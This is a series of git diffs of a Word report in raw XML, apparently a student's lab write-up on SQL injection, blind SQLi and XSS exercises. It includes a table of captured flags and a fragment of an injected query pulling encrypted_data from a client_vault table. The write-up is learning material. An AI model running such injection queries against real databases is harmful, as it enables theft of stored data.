+        <w:t>encrypted_data,'b','c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">' FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B42F6" wp14:editId="4DFB0F81">
+            <wp:extent cx="5498275" cy="3098066"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
+            <wp:docPr id="1427756851" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1427756851" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5501085" cy="3099649"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9354" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="5720"/>
+        <w:gridCol w:w="3634"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="416"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Flags Found</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> CORRECT?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Keep_looking_elsewhere</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Not_the_real_flag_here</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Nice_try_Kiddo_Now_try_next</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>YES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_3}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_ture_3}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDA5D8F" wp14:editId="7628CB69">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
+            <wp:docPr id="877861948" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="877861948" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>

--- a/report.docx
+++ b/report.docx
@@ -77,6 +77,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
             </w:rPr>
           </w:pPr>
@@ -89,7 +90,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc214867870" w:history="1">
+          <w:hyperlink w:anchor="_Toc214873927" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -116,7 +117,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc214867870 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc214873927 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -136,7 +137,76 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc214873928" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>02 SQL Injection – Advance - Exploit a bit advanced SQL Query</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc214873928 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -169,7 +239,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc214867870"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc214873927"/>
       <w:r>
         <w:t>01 SQL Injection - Basic Exploit a basic SQL Query</w:t>
       </w:r>
@@ -970,6 +1040,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc214873928"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>0</w:t>
@@ -1004,6 +1075,7 @@
       <w:r>
         <w:t>Query</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p/>
     <w:p>

--- a/report.docx
+++ b/report.docx
@@ -90,7 +90,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc214873927" w:history="1">
+          <w:hyperlink w:anchor="_Toc215144136" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -117,7 +117,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc214873927 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215144136 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -159,7 +159,7 @@
               <w:noProof/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc214873928" w:history="1">
+          <w:hyperlink w:anchor="_Toc215144137" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -186,7 +186,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc214873928 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215144137 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -207,6 +207,144 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc215144138" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>03 SQLi blind – Advance - Exploit a bit advanced SQL Query</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215144138 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>10</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc215144139" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>04 SQL Injection – Advance - Exploit a bit advanced SQL Query</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc215144139 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -239,7 +377,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc214873927"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc215144136"/>
       <w:r>
         <w:t>01 SQL Injection - Basic Exploit a basic SQL Query</w:t>
       </w:r>
@@ -270,7 +408,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="66CACC8E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39909861" wp14:editId="1BB748A7">
             <wp:extent cx="5411349" cy="3040083"/>
             <wp:effectExtent l="0" t="0" r="0" b="8255"/>
             <wp:docPr id="812995017" name="Picture 1"/>
@@ -287,7 +425,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5" cstate="print">
+                    <a:blip r:embed="rId7" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -336,7 +474,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="19016D4C">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60659F1C" wp14:editId="239EBCA2">
             <wp:extent cx="5403273" cy="3035547"/>
             <wp:effectExtent l="0" t="0" r="6985" b="0"/>
             <wp:docPr id="1998281954" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
@@ -353,7 +491,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6" cstate="print">
+                    <a:blip r:embed="rId8" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -398,7 +536,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="6B438991">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555736AB" wp14:editId="30E03003">
             <wp:extent cx="5284519" cy="2968831"/>
             <wp:effectExtent l="0" t="0" r="0" b="3175"/>
             <wp:docPr id="1882154418" name="Picture 3"/>
@@ -415,7 +553,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7" cstate="print">
+                    <a:blip r:embed="rId9" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -495,7 +633,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8" cstate="print">
+                    <a:blip r:embed="rId10" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -550,6 +688,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B58A0B9" wp14:editId="64316A2F">
@@ -567,7 +708,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -635,6 +776,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289DBC68" wp14:editId="0227579A">
             <wp:extent cx="5943600" cy="3341370"/>
@@ -651,7 +795,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -993,6 +1137,9 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1323071F" wp14:editId="15C4DDCE">
             <wp:extent cx="5943600" cy="3341370"/>
@@ -1009,7 +1156,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1040,7 +1187,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc214873928"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc215144137"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>0</w:t>
@@ -1067,25 +1214,14 @@
         <w:t xml:space="preserve">- </w:t>
       </w:r>
       <w:r>
-        <w:t>Exploit a bit advanced SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Query</w:t>
+        <w:t>Exploit a bit advanced SQL Query</w:t>
       </w:r>
       <w:bookmarkEnd w:id="1"/>
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Starting of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
+      <w:r>
+        <w:t>Starting of with a basic query to see what we can find</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1096,6 +1232,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E83EBC" wp14:editId="63BB8AEF">
             <wp:extent cx="5197642" cy="2926450"/>
@@ -1112,7 +1251,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1150,6 +1289,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABC84BB" wp14:editId="51611172">
             <wp:extent cx="5094514" cy="2864030"/>
@@ -1166,7 +1308,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1237,6 +1379,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72306EAB" wp14:editId="1BAC5AF7">
             <wp:extent cx="5943600" cy="3341370"/>
@@ -1253,7 +1398,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1322,6 +1467,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B42F6" wp14:editId="4DFB0F81">
@@ -1339,7 +1487,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1584,6 +1732,9 @@
     </w:tbl>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDA5D8F" wp14:editId="7628CB69">
@@ -1601,7 +1752,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1622,6 +1773,367 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc215144138"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:t>It's a blind SQL. It doesn't</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>show error msg, or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>expected</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>query upon</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>injection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Sdads</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc215144139"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+      <w:r>
+        <w:t xml:space="preserve"> Cross-Site Scripting</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(XSS)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
